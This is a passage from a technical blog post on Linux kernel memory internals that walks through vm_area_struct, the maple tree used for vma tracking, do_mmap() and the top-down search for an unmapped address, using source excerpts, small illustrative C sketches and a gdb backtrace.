</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">terminated</span> <span class="n">string</span> <span class="n">containing</span> <span class="n">the</span> <span class="n">name</span> <span class="n">given</span> <span class="n">to</span> <span class="n">the</span> <span class="n">vma</span><span class="p">,</span> <span class="ow">or</span> <span class="n">NULL</span> <span class="k">if</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*</span> <span class="n">unnamed</span><span class="o">.</span> <span class="n">Serialized</span> <span class="n">by</span> <span class="n">mmap_lock</span><span class="o">.</span> <span class="n">Use</span> <span class="n">anon_vma_name</span> <span class="n">to</span> <span class="n">access</span><span class="o">.</span>
</span></span><span class="line"><span class="cl">	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">anon_vma_name</span> <span class="o">*</span><span class="n">anon_name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_SWAP</span>
</span></span><span class="line"><span class="cl">	<span class="n">atomic_long_t</span> <span class="n">swap_readahead_info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifndef CONFIG_MMU</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vm_region</span> <span class="o">*</span><span class="n">vm_region</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NOMMU</span> <span class="n">mapping</span> <span class="n">region</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_NUMA</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">mempolicy</span> <span class="o">*</span><span class="n">vm_policy</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NUMA</span> <span class="n">policy</span> <span class="k">for</span> <span class="n">the</span> <span class="n">VMA</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl"><span class="c1">#ifdef CONFIG_NUMA_BALANCING</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vma_numab_state</span> <span class="o">*</span><span class="n">numab_state</span><span class="p">;</span>	<span class="o">/*</span> <span class="n">NUMA</span> <span class="n">Balancing</span> <span class="n">state</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="c1">#endif</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">vm_userfaultfd_ctx</span> <span class="n">vm_userfaultfd_ctx</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</span></span></code></pre></div><p>Perhaps understandably, there&rsquo;s a lot going on here! But this is the structure, referred to as a <code>vma</code>, that describes the virtual memory areas of a process. For example, you can see at the top that <code>vm_start</code> and <code>vm_end</code> define the start and end addresses of the vma (the end is exclusive, per the <code>[vm_start; vm_end)</code> comment); just below that, <code>vm_mm</code> holds a reference to the <code>mm</code> the vma belongs to, and so on.</p>
<p>We&rsquo;ll touch more on each field as it becomes relevant, but I just wanted to introduce the structure here rather than trying to wedge it in when it crops up down the line.</p>
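<p>To make the half-open <code>[vm_start; vm_end)</code> convention concrete, here is a small userspace sketch. <code>struct toy_vma</code> and its helpers are hypothetical stand-ins I&rsquo;ve made up for illustration; they only model the first two fields and are not kernel code.</p>

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical userspace stand-in for the first two fields of a vma. */
struct toy_vma {
	unsigned long vm_start;	/* first address inside the area */
	unsigned long vm_end;	/* first address past the area */
};

/* True if addr falls within [vm_start, vm_end). */
static bool toy_vma_contains(const struct toy_vma *vma, unsigned long addr)
{
	return addr >= vma->vm_start && addr < vma->vm_end;
}

/* Size in bytes; with an exclusive end this is a plain subtraction. */
static unsigned long toy_vma_size(const struct toy_vma *vma)
{
	assert(vma->vm_end > vma->vm_start);
	return vma->vm_end - vma->vm_start;
}
```

<p>Plugging in our mapping from earlier (<code>7f556e60a000-7f556e60b000</code>), the size comes out as <code>0x1000</code>, the last byte at <code>0x7f556e60afff</code> is inside the area and <code>0x7f556e60b000</code> is not.</p>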
<h4 id="mm-mmmt"><code>mm-&gt;mm_mt</code></h4>
<p>Okay, so a vma describes a single memory area, but as we saw, even our little program has quite a few memory areas - how are these all managed? Good question!</p>
<p>Each process is responsible for tracking its memory areas, and as we know, each process&rsquo;s memory is managed by an <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779"><code>mm_struct</code></a>! So this is where we&rsquo;ll find our answer:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">struct mm_struct {
</span></span><span class="line"><span class="cl">		// SNIP
</span></span><span class="line"><span class="cl">		struct maple_tree mm_mt;
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779">include/linux/mm_types.h</a></p>
<p>Previously, this would have been <code>struct rb_root mm_rb;</code>, but in 6.1 the kernel moved from red-black trees to the <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/maple_tree.h#L219"><code>maple_tree</code></a> data structure for vma management.</p>
<p>I&rsquo;m but a humble researcher, so if you&rsquo;re interested in diving more into maple tree internals, this <a href="https://lwn.net/Articles/845507/">LWN article</a> does a great job introducing maple trees (alternatively, head straight to the <a href="https://docs.kernel.org/core-api/maple_tree.html">kernel docs</a>). Suffice it to say it&rsquo;s a cache-optimised, low memory footprint data structure ideal for storing non-overlapping ranges - perfect for vmas!</p>
<p>The key details to highlight are that:</p>
<ul>
<li><code>mm_mt</code> is the tree of vmas belonging to the <code>mm_struct</code>&rsquo;s process.</li>
<li>A vma is represented as a node within the tree, but the tree is also able to track gaps between these vmas (i.e. gaps in the virtual address space).</li>
<li>The maple tree data structure comes with its own normal and advanced API, but there is also a set of wrapper functions specifically for handling vma maple tree usage.</li>
</ul>
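<p>To get a feel for what &ldquo;non-overlapping ranges plus gaps&rdquo; buys us, here is a deliberately simple userspace model. To be clear, this is <em>not</em> how the maple tree is implemented: it&rsquo;s a sorted array with a binary search, and <code>struct toy_range</code>, <code>toy_lookup()</code> and <code>toy_find_gap()</code> are hypothetical names of my own. It only illustrates the two questions the mm asks of <code>mm_mt</code>: which area holds this address, and where is there room for a new one?</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model of one entry: a half-open address range. */
struct toy_range {
	unsigned long start;	/* inclusive */
	unsigned long end;	/* exclusive */
};

/*
 * Binary search a sorted, non-overlapping array for the range holding
 * addr. Returns NULL if addr falls in a gap (or outside every range).
 */
static const struct toy_range *toy_lookup(const struct toy_range *r, size_t n,
					  unsigned long addr)
{
	size_t lo = 0, hi = n;

	while (lo < hi) {
		size_t mid = lo + (hi - lo) / 2;

		if (addr < r[mid].start)
			hi = mid;
		else if (addr >= r[mid].end)
			lo = mid + 1;
		else
			return &r[mid];
	}
	return NULL;
}

/*
 * Return the start of the lowest gap between two neighbouring ranges
 * that is at least len bytes long, or 0 if there is none.
 */
static unsigned long toy_find_gap(const struct toy_range *r, size_t n,
				  unsigned long len)
{
	for (size_t i = 0; i + 1 < n; i++) {
		if (r[i + 1].start - r[i].end >= len)
			return r[i].end;
	}
	return 0;
}
```

<p>Feed it a few lines from our <code>maps</code> output (say <code>00400000-00401000</code>, <code>00401000-0047c000</code> and the heap at <code>15b3e000-15b60000</code>) and a lookup of <code>0x401234</code> lands in the second range, while the first page-sized gap starts at <code>0x47c000</code>.</p>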
<h3 id="dommap"><code>do_mmap()</code></h3>
<p><img src="https://sam4k.com/content/images/2025/04/so_where_we_were.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/*
</span></span></span><span class="line"><span class="cl"><span class="cm"> * The caller must write-lock current-&gt;mm-&gt;mmap_lock.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">uf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></p>
<p>Okay, let&rsquo;s get back to it! For some context, upon entering <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255"><code>do_mmap()</code></a>:</p>
<ul>
<li><code>file</code> is NULL as we&rsquo;re mapping anonymous memory (<a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/uapi/asm-generic/mman-common.h#L23"><code>MAP_ANONYMOUS</code></a>), i.e. we&rsquo;re not mapping a file into our userspace process, but a chunk of &ldquo;anonymous&rdquo; physical memory.</li>
<li><code>vm_flags</code> stores the flags used for the virtual memory mapping we&rsquo;re creating. In this case, the caller <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575"><code>vm_mmap_pgoff()</code></a> does not specify any flags.</li>
<li><code>populate</code> is an <code>unsigned long*</code> initialised by <code>do_mmap()</code> and read by the caller, to determine if the mapping should be &ldquo;populated&rdquo; before returning to userspace. We&rsquo;ll touch more on the significance of that later, just know that a mapping is populated when <code>MAP_POPULATE</code> is set and <code>MAP_NONBLOCK</code> is not (so not our case study).</li>
<li><code>uf</code>, which relates to <a href="https://man7.org/linux/man-pages/man2/userfaultfd.2.html"><code>userfaultfd(2)</code></a>, is a linked list initialised by the caller. It&rsquo;s not touched in <code>do_mmap()</code> and probably out of scope for this series anyway, so we&rsquo;ll ignore it for now.</li>
<li><code>addr</code>, <code>len</code>, <code>prot</code>, <code>flags</code>, <code>pgoff</code> all correspond to the same values we passed into <code>mmap(2)</code> from our userspace program.</li>
</ul>
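<p>To tie those arguments back to userspace, here&rsquo;s a minimal sketch of the kind of call that produces them. The helper name <code>map_one_anon_page()</code> is made up for illustration; the numeric values (<code>len=4096</code>, <code>prot=3</code>, <code>flags=34</code>) are the ones that show up in the gdb backtraces in this post, and the constants assume Linux on x86_64.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

/* On Linux/x86_64 these combine to the prot=3 and flags=34 seen in gdb. */
_Static_assert((PROT_READ | PROT_WRITE) == 3, "prot should be 3");
_Static_assert((MAP_PRIVATE | MAP_ANONYMOUS) == 34, "flags should be 34");

/* Hypothetical helper: map a single private, anonymous, read/write page. */
void *map_one_anon_page(void)
{
	return mmap(NULL,                        /* addr: no hint, kernel picks   */
		    4096,                        /* len                           */
		    PROT_READ | PROT_WRITE,      /* prot                          */
		    MAP_PRIVATE | MAP_ANONYMOUS, /* flags                         */
		    -1,                          /* fd: unused, so file == NULL   */
		    0);                          /* offset, becomes pgoff == 0    */
}
```

<p>Calling this and checking the result against <code>MAP_FAILED</code> is all a userspace program needs to do; everything else in this section happens on the kernel side.</p>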
<p>Okay, so what&rsquo;s the goal of this function? We know from exploring the previous functions in the call stack that the return value is the value that <code>mmap(2)</code> returns to userspace: on success, the userspace address of the mapping; on error, the <code>MAP_FAILED</code> value (<code>(void *) -1</code>). So where does <code>do_mmap()</code>&rsquo;s return value come from?</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">do_mmap</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">prot</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">flags</span><span class="p">,</span> <span class="kt">vm_flags_t</span> <span class="n">vm_flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="n">populate</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="k">struct</span> <span class="n">list_head</span> <span class="o">*</span><span class="n">uf</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="n">addr</span> <span class="o">=</span> <span class="nf">mmap_region</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="n">uf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// SNIP
</span></span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">mm/mmap.c</a></p>
<p>Hm, so it looks like the rabbit hole goes deeper! <code>do_mmap()</code>&rsquo;s job is to process and sanitise its arguments so that they can be passed to <code>mmap_region()</code>, which sets up the actual memory mapping (right??? surely there&rsquo;s no more calls).</p>
<p>More specifically, <code>do_mmap()</code> has a few responsibilities, including:</p>
<ul>
<li>Sanitising values and performing any necessary checks, such as preventing overflows or stopping the user exceeding the maximum mapping count defined by <a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L202"><code>sysctl_max_map_count</code></a>.</li>
<li>Calculating the correct <code>vm_flags</code>, which are later applied to the <code>struct vm_area_struct</code> created for this mapping, based on various factors such as <code>prot</code>, <code>flags</code>, <code>mm-&gt;def_flags</code> etc.</li>
<li>Determining what userspace virtual address, stored in <code>addr</code>, is passed to <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L2849"><code>mmap_region()</code></a>.</li>
</ul>
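<p>As a rough illustration of the <code>vm_flags</code> calculation, the sketch below models how <code>prot</code> turns into <code>vm_flags</code> for our simple mapping. It is a simplification under stated assumptions: the <code>VM_*</code> values are copied from <code>include/linux/mm.h</code>, the function name <code>sketch_vm_flags()</code> is hypothetical, and the contribution from <code>flags</code> is ignored entirely, which I believe is fine for a plain <code>MAP_PRIVATE | MAP_ANONYMOUS</code> request but not in general.</p>

```c
#include <assert.h>
#include <sys/mman.h>

/* Values as defined in the kernel's include/linux/mm.h. */
#define VM_READ     0x01UL
#define VM_WRITE    0x02UL
#define VM_EXEC     0x04UL
#define VM_MAYREAD  0x10UL
#define VM_MAYWRITE 0x20UL
#define VM_MAYEXEC  0x40UL

/*
 * Simplified model (an assumption, not the kernel's code): translate the
 * PROT_* bits, OR in the mm's default flags, then add the VM_MAY* bits
 * that do_mmap() grants by default.
 */
unsigned long sketch_vm_flags(unsigned long prot, unsigned long def_flags)
{
	unsigned long vm_flags = 0;

	if (prot & PROT_READ)
		vm_flags |= VM_READ;
	if (prot & PROT_WRITE)
		vm_flags |= VM_WRITE;
	if (prot & PROT_EXEC)
		vm_flags |= VM_EXEC;

	vm_flags |= def_flags;
	vm_flags |= VM_MAYREAD | VM_MAYWRITE | VM_MAYEXEC;
	return vm_flags;
}
```

<p>With <code>prot == PROT_READ | PROT_WRITE</code> and no default flags this yields <code>0x73</code>, i.e. the <code>vm_flags=115</code> that appears in the gdb backtraces in this post.</p>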
<h4 id="finding-a-suitable-addr">Finding A Suitable <code>addr</code></h4>
<p><img src="https://sam4k.com/content/images/2025/04/our_address.gif" alt=""></p>
<p>In order to find a suitable <code>addr</code> for our new memory mapping, broadly speaking, there are two general cases for <code>do_mmap()</code> to consider:</p>
<ul>
<li>Case A: <code>flags</code> includes <code>MAP_FIXED</code> or <code>MAP_FIXED_NOREPLACE</code></li>
<li>Case B: <code>flags</code> includes neither <code>MAP_FIXED</code> nor <code>MAP_FIXED_NOREPLACE</code> (our case)</li>
</ul>
<p>For Case A, the fixed <code>addr</code> specified by the user is passed to <code>mmap_region()</code>. However, the virtual address range spanned by this new mapping (<code>addr</code> to <code>addr + len</code>) might overlap existing ones. The default behaviour is to unmap the overlapped part. If <code>MAP_FIXED_NOREPLACE</code> is set though, <code>do_mmap()</code> will return <code>-EEXIST</code> if the new mapping will end up overlapping any existing ones.</p>
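<p>The <code>MAP_FIXED_NOREPLACE</code> behaviour is easy to poke at from userspace. Here&rsquo;s a small sketch (the helper name is made up) that maps a page and then asks for a second mapping at exactly the same address. It assumes a 4KB page size and a kernel that knows the flag (Linux 4.17+); older kernels ignore the flag and treat the address as a hint, which the sketch tolerates.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <sys/mman.h>

#ifndef MAP_FIXED_NOREPLACE
#define MAP_FIXED_NOREPLACE 0x100000 /* fallback for older libc headers */
#endif

/*
 * Hypothetical helper: returns the errno from the colliding mmap(2),
 * or 0 if the second mapping did not fail.
 */
int noreplace_collision_errno(void)
{
	const size_t len = 4096;
	int err = 0;

	void *first = mmap(NULL, len, PROT_READ | PROT_WRITE,
			   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	assert(first != MAP_FAILED);

	/* Same range again, but refuse to clobber what is already there. */
	void *second = mmap(first, len, PROT_READ | PROT_WRITE,
			    MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED_NOREPLACE,
			    -1, 0);
	if (second == MAP_FAILED)
		err = errno;
	else if (second != first)
		munmap(second, len); /* flag was ignored, addr used as a hint */

	munmap(first, len);
	return err;
}
```

<p>On a kernel that supports the flag I&rsquo;d expect this to return <code>EEXIST</code>, matching the <code>-EEXIST</code> path described above.</p>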
<p>In Case B, on the other hand, the kernel determines the <code>addr</code> itself. The value of <code>addr</code> passed by the user is only used as a hint about where to place the mapping. Note the &ldquo;hint&rdquo; <code>addr</code> is page aligned and, if it is non-NULL, rounded up to a minimum value of <code>mmap_min_addr</code>[1] by <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1194"><code>round_hint_to_min()</code></a>. This call happens in our case too, although a NULL hint (<code>addr == 0</code>) is passed through unchanged.</p>
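<p>The hint rounding is small enough to model in a few lines. This is a userspace sketch of my reading of <code>round_hint_to_min()</code>, not a copy of it: the <code>SK_</code> names are made up, the page size is assumed to be 4KB, and <code>mmap_min_addr</code> is passed in as a parameter rather than read from the sysctl.</p>

```c
#include <assert.h>

#define SK_PAGE_SIZE     4096UL
#define SK_PAGE_MASK     (~(SK_PAGE_SIZE - 1))
#define SK_PAGE_ALIGN(x) (((x) + SK_PAGE_SIZE - 1) & SK_PAGE_MASK)

_Static_assert((SK_PAGE_SIZE & (SK_PAGE_SIZE - 1)) == 0,
	       "page size must be a power of two");

/* Sketch: page-align the hint and lift non-NULL hints up to mmap_min_addr. */
unsigned long sketch_round_hint_to_min(unsigned long hint,
				       unsigned long mmap_min_addr)
{
	hint &= SK_PAGE_MASK;              /* round down to a page boundary */
	if (hint != 0 && hint < mmap_min_addr)
		return SK_PAGE_ALIGN(mmap_min_addr);
	return hint;                       /* NULL hints stay NULL          */
}
```

<p>So with a <code>mmap_min_addr</code> of <code>0x10000</code>, a hint of <code>0x1234</code> becomes <code>0x10000</code>, while our hint of <code>0</code> stays <code>0</code> and the kernel is free to pick the address.</p>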
<p>In either case, <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1923"><code>__get_unmapped_area()</code></a> is called to determine an appropriate <code>addr</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl">	<span class="cm">/* Obtain the address to map to. we verify (or select) it and ensure
</span></span></span><span class="line"><span class="cl"><span class="cm">	 * that it represents a valid section of the address space.
</span></span></span><span class="line"><span class="cl"><span class="cm">	 */</span>
</span></span><span class="line"><span class="cl">	<span class="n">addr</span> <span class="o">=</span> <span class="nf">__get_unmapped_area</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">addr</span><span class="p">,</span> <span class="n">len</span><span class="p">,</span> <span class="n">pgoff</span><span class="p">,</span> <span class="n">flags</span><span class="p">,</span> <span class="n">vm_flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">IS_ERR_VALUE</span><span class="p">(</span><span class="n">addr</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">addr</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1325">mm/mmap.c</a></p>
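<p>A quick aside on that <code>IS_ERR_VALUE()</code> check: kernel functions that return an address as an <code>unsigned long</code> report failure by returning a negated errno, which lands in the top 4095 values of the address space. The sketch below is a userspace model of that idea, with made-up <code>sketch_</code>/<code>SK_</code> names and assuming a 64-bit <code>unsigned long</code>.</p>

```c
#include <assert.h>
#include <errno.h>

#define SK_MAX_ERRNO 4095UL /* mirrors the kernel's MAX_ERRNO */

/* Sketch: is x one of the values reserved for -1 .. -MAX_ERRNO? */
int sketch_is_err_value(unsigned long x)
{
	return x >= (unsigned long)-SK_MAX_ERRNO;
}
```

<p>A plausible user address such as <code>0x7f4bc62a2000</code> is nowhere near that range, whereas <code>(unsigned long)-ENOMEM</code> sits right inside it, so a single comparison is enough to tell an address from an error.</p>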
<p>To avoid getting too lost in the sauce, we&rsquo;ll skim over <code>__get_unmapped_area()</code>. Essentially it does some more sanitisation and checks. This includes another LSM hook (<code>mmap_addr</code>) on the <code>addr</code> yielded at the end of this function, as well as an arch-specific check (<code>arch_mmap_check()</code>) which is currently only used by <code>arm</code> and <code>sparc</code>.</p>
<p>The approach used to get the unmapped area depends on a few factors:</p>
<ul>
<li>If it&rsquo;s a file, some file types may implement their own method to get an area.</li>
<li>If it&rsquo;s a shared anonymous mapping, rather than directly allocating physical memory it actually uses a special shmem (shared memory) file (maybe we&rsquo;ll touch on this later).</li>
<li>Finally, if neither case applies (i.e. <code>MAP_PRIVATE | MAP_ANON</code>), it will use either <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/huge_memory.c#L926"><code>thp_get_unmapped_area_vmflags()</code></a> (if <code>CONFIG_TRANSPARENT_HUGEPAGE=y</code>) or <a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1911"><code>mm_get_unmapped_area_vmflags()</code></a> - this is the case we&rsquo;re interested in!</li>
</ul>
<p>Transparent Huge Pages (THPs) are a kernel feature for &hellip; you guessed it! Enabling huge pages, transparently! Currently for anonymous memory mappings and tmpfs/shmem.</p>
<p>If we recall our <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">page primer</a>, pages are typically defined as 4KB (<code>0x1000</code> bytes) chunks of physical memory. A &ldquo;huge page&rdquo; here is 2M (<code>0x200000</code> bytes) in size. So the tl;dr here is that <code>thp_get_unmapped_area_vmflags()</code> will try and align the <code>addr</code> to a 2M boundary so that it can be used as a huge page automatically (AKA transparently!). It&rsquo;s okay if this doesn&rsquo;t make total sense yet, as we&rsquo;ll cover paging in more detail soon!</p>
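<p>If the alignment part feels a bit abstract, here&rsquo;s the arithmetic in isolation. This is just a sketch of what &ldquo;aligned to a 2M boundary&rdquo; means, using made-up helper names and the page sizes quoted above; it makes no claim about which direction the kernel rounds in.</p>

```c
#include <assert.h>

#define SK_PAGE_SIZE  0x1000UL   /* 4KB base page  */
#define SK_HPAGE_SIZE 0x200000UL /* 2MB huge page  */

/* Round addr down to a multiple of align (align must be a power of two). */
unsigned long sketch_align_down(unsigned long addr, unsigned long align)
{
	assert(align != 0 && (align & (align - 1)) == 0);
	return addr & ~(align - 1);
}

/* Round addr up to a multiple of align (align must be a power of two). */
unsigned long sketch_align_up(unsigned long addr, unsigned long align)
{
	assert(align != 0 && (align & (align - 1)) == 0);
	return (addr + align - 1) & ~(align - 1);
}

/* An address can back a huge page only if its low 21 bits are zero. */
int sketch_is_huge_aligned(unsigned long addr)
{
	return (addr & (SK_HPAGE_SIZE - 1)) == 0;
}
```

<p>For example, <code>0x7f4bc62a3000</code> is page aligned but not huge page aligned; its neighbouring 2M boundaries are <code>0x7f4bc6200000</code> below and <code>0x7f4bc6400000</code> above. A single huge page also covers <code>0x200000 / 0x1000 = 512</code> base pages.</p>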
<p>Either way it will end up using <code>mm_get_unmapped_area_vmflags()</code>, so that&rsquo;s where we&rsquo;ll go next! Well, briefly. Because this function will then call into an arch-specific function depending on whether the <code>MMF_TOPDOWN</code> bit is set in our process&rsquo;s <code>mm-&gt;flags</code>. This determines whether we&rsquo;ll search from the top or bottom of our address space for an unmapped area.</p>
<p>On x86_64 this is set, which leads us to <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L161"><code>arch_get_unmapped_area_topdown_vmflags()</code></a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">(gdb) bt
</span></span><span class="line"><span class="cl">#0  arch_get_unmapped_area_topdown_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr0=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at arch/x86/kernel/sys_x86_64.c:164
</span></span><span class="line"><span class="cl">#1  0xffffffff81244143 in mm_get_unmapped_area_vmflags (mm=&lt;optimized out&gt;, filp=filp@entry=0x0 &lt;fixed_percpu_data&gt;, addr=addr@entry=0, 
</span></span><span class="line"><span class="cl">    len=len@entry=4096, pgoff=pgoff@entry=0, flags=flags@entry=34, vm_flags=115) at mm/mmap.c:1917
</span></span><span class="line"><span class="cl">#2  0xffffffff81294a5d in thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:937
</span></span><span class="line"><span class="cl">#3  thp_get_unmapped_area_vmflags (filp=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=len@entry=4096, pgoff=0, flags=34, vm_flags=115)
</span></span><span class="line"><span class="cl">    at mm/huge_memory.c:926
</span></span><span class="line"><span class="cl">#4  0xffffffff81244284 in __get_unmapped_area (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    pgoff=&lt;optimized out&gt;, pgoff@entry=0, flags=flags@entry=34, vm_flags=vm_flags@entry=115) at mm/mmap.c:1957
</span></span><span class="line"><span class="cl">#5  0xffffffff8124725d in do_mmap (file=file@entry=0x0 &lt;fixed_percpu_data&gt;, addr=&lt;optimized out&gt;, addr@entry=0, len=len@entry=4096, 
</span></span><span class="line"><span class="cl">    prot=prot@entry=3, flags=flags@entry=34, vm_flags=115, vm_flags@entry=0, pgoff=0, populate=0xffffc9000076bee8, uf=0xffffc9000076bef0)
</span></span><span class="line"><span class="cl">    at mm/mmap.c:1325
</span></span><span class="line"><span class="cl">#6  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 &lt;fixed_percpu_data&gt;, addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
</span></span><span class="line"><span class="cl">#7  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:52
</span></span><span class="line"><span class="cl">#8  do_syscall_64 (regs=0xffffc9000076bf58, nr=&lt;optimized out&gt;) at arch/x86/entry/common.c:83
</span></span><span class="line"><span class="cl">#9  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121
</span></span></code></pre></div><p>We made it! Okay, let&rsquo;s dig into how the address is fetched by walking through the function. There are various checks but for brevity I will focus on the addr finding:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">unsigned</span> <span class="kt">long</span>
</span></span><span class="line"><span class="cl"><span class="nf">arch_get_unmapped_area_topdown_vmflags</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">filp</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">addr0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">len</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">pgoff</span><span class="p">,</span>
